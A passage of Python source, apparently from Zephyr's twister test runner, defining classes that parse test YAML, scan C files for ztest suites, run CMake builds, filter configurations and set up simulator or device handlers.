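#   _cast_value("1 2 3", "list:int") -> [1, 2, 3]
#   _cast_value("a b", "set")        -> {"a", "b"}
#   _cast_value("60", "int")         -> 60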
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in an ad hoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
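# For example, a "filter" of "CONFIG_A" in "common" combined with a
# per-test filter of "CONFIG_B" becomes "(CONFIG_A) and (CONFIG_B)";
# other string keys are simply concatenated with a space.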
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestCase.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
ztest_suite_names Names of found ztest suites
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False,
ztest_suite_names: List[str] = []):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
self.ztest_suite_names = ztest_suite_names
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main and
(sorted(self.ztest_suite_names) ==
sorted(other.ztest_suite_names)))
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
self.ztest_suite_names = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
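# Illustrative example: a testcase.yaml found under
# $ZEPHYR_BASE/tests/kernel/sem defining a test named "kernel.semaphore"
# gets the unique name "tests/kernel/sem/kernel.semaphore".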
def scan_file(self, inf_name):
regular_suite_regex = re.compile(
# Do not match until end-of-line, otherwise the testcase regex applied
# later would miss the ones declared on the same line, since we only
# search starting at the end of this match.
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
new_suite_regex = re.compile(
br"^\s*ZTEST_SUITE\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
regular_suite_regex_matches = \
[m for m in regular_suite_regex.finditer(main_c)]
registered_suite_regex_matches = \
[m for m in registered_suite_regex.finditer(main_c)]
new_suite_regex_matches = \
[m for m in new_suite_regex.finditer(main_c)]
if registered_suite_regex_matches:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if regular_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(regular_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, regular_suite_regex_matches, has_registered_test_suites)
elif registered_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(registered_suite_regex_matches)
testcase_names, warnings = \
self._find_regular_ztest_testcases(main_c, registered_suite_regex_matches, has_registered_test_suites)
elif new_suite_regex_matches:
ztest_suite_names = \
self._extract_ztest_suite_names(new_suite_regex_matches)
testcase_names, warnings = \
self._find_new_ztest_testcases(main_c)
else:
# Can't find ztest_test_suite; the file may just be a client that
# includes ztest.h.
ztest_suite_names = []
testcase_names, warnings = None, None
return ScanPathResult(
matches=testcase_names,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main,
ztest_suite_names=ztest_suite_names)
@staticmethod
def _extract_ztest_suite_names(suite_regex_matches):
ztest_suite_names = \
[m.group("suite_name") for m in suite_regex_matches]
ztest_suite_names = \
[name.decode("UTF-8") for name in ztest_suite_names]
return ztest_suite_names
def _find_regular_ztest_testcases(self, search_area, suite_regex_matches, is_registered_test_suite):
"""
Find regular ztest testcases like "ztest_unit_test" or similar. Return
the testcase names and any warnings that were found.
"""
testcase_regex = re.compile(
br"""^\s* # empty space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<testcase_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
search_start, search_end = \
self._get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite)
limited_search_area = search_area[search_start:search_end]
testcase_names, warnings = \
self._find_ztest_testcases(limited_search_area, testcase_regex)
achtung_matches = re.findall(achtung_regex, limited_search_area)
if achtung_matches and warnings is None:
achtung = ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
warnings = f"found invalid {achtung} in ztest_test_suite()"
return testcase_names, warnings
@staticmethod
def _get_search_area_boundary(search_area, suite_regex_matches, is_registered_test_suite):
"""
Get search area boundary based on "ztest_test_suite(...)",
"ztest_register_test_suite(...)" or "ztest_run_test_suite(...)"
functions occurrence.
"""
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
search_start = suite_regex_matches[0].end()
suite_run_match = suite_run_regex.search(search_area)
if suite_run_match:
search_end = suite_run_match.start()
elif not suite_run_match and not is_registered_test_suite:
raise ValueError("can't find ztest_run_test_suite")
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(search_area, search_start) \
.end()
return search_start, search_end
def _find_new_ztest_testcases(self, search_area):
"""
Find new-style ztest testcases declared with "ZTEST" or "ZTEST_F". Return
the testcase names and any warnings that were found.
"""
testcase_regex = re.compile(
br"^\s*(?:ZTEST|ZTEST_F)\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,"
br"\s*(?P<testcase_name>[a-zA-Z0-9_]+)\s*",
re.MULTILINE)
return self._find_ztest_testcases(search_area, testcase_regex)
@staticmethod
def _find_ztest_testcases(search_area, testcase_regex):
"""
Parse the search area and try to find testcases defined by the
testcase_regex argument. Return the testcase names and any warnings found.
"""
testcase_regex_matches = \
[m for m in testcase_regex.finditer(search_area)]
testcase_names = \
[m.group("testcase_name") for m in testcase_regex_matches]
testcase_names = [name.decode("UTF-8") for name in testcase_names]
warnings = None
for testcase_name in testcase_names:
if not testcase_name.startswith("test_"):
warnings = "Found a test that does not start with test_"
testcase_names = \
[tc_name.replace("test_", "", 1) for tc_name in testcase_names]
return testcase_names, warnings
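# Note that the "test_" prefix is stripped above, so a declaration such as
# ztest_unit_test(test_foo) yields the subcase name "foo"; names that do
# not start with "test_" trigger a warning instead.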
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
ztest_suite_names = []
src_dir_path = self._find_src_dir_path(path)
for filename in glob.glob(os.path.join(src_dir_path, "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.ztest_suite_names:
ztest_suite_names += result.ztest_suite_names
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases, ztest_suite_names
def parse_subcases(self, test_path):
subcases, ztest_suite_names = self.scan_path(test_path)
for sub in subcases:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not subcases:
self.cases.append(self.id)
self.ztest_suite_names = ztest_suite_names
@staticmethod
def _find_src_dir_path(test_dir_path):
"""
Try to find the src directory containing the test source code. Sometimes,
for optimization reasons, it is placed in the parent directory.
"""
src_dir_name = "src"
src_dir_path = os.path.join(test_dir_path, src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
src_dir_path = os.path.join(test_dir_path, "..", src_dir_name)
if os.path.isdir(src_dir_path):
return src_dir_path
return ""
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.run_id = self._get_run_id()
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def _get_run_id(self):
""" generate run id from instance unique identifier and a random
number"""
hash_object = hashlib.md5(self.name.encode())
random_str = f"{random.getrandbits(64)}".encode()
hash_object.update(random_str)
return hash_object.hexdigest()
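# The run id is an md5 digest of the instance name mixed with 64 random
# bits; it is later passed to CMake as TC_RUNID (see run_cmake) so the
# built image can be associated with this particular run.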
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# Right now we only support building on Windows; running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory, otherwise this overlay would
# be passed to kconfig.py *twice* and kconfig.cmake would silently give
# that second pass precedence over any --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
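# Illustrative content of the generated twister/testcase_extra.conf for a
# coverage-enabled ASAN build on a "native" platform:
#   CONFIG_COVERAGE=y
#   CONFIG_COVERAGE_DUMP=y
#   CONFIG_ASAN=y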
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance-level status to the test
cases inside. Useful when the whole instance is skipped and the info is
also required at the test-case level for reporting. Should be used with
caution; e.g. it should not be used to fill all results with passes.
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# The build failed; check the log to decide whether it was a memory
# overflow (skip) or a real error.
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
self.instance.fill_results_by_status()
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
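# The tc_filter expression from testcase.yaml is evaluated against the
# merged defconfig, CMake cache, environment and (when available) the
# devicetree edt. The map returned below uses True to mean "filter this
# instance out".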
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
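# Pipeline stages handled below: "cmake" configures the build (and may
# filter the instance out), "build" compiles it, "gather_metrics" collects
# size data, "run" executes it via the configured handler, and
# "report"/"cleanup" record results and prune build artifacts.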
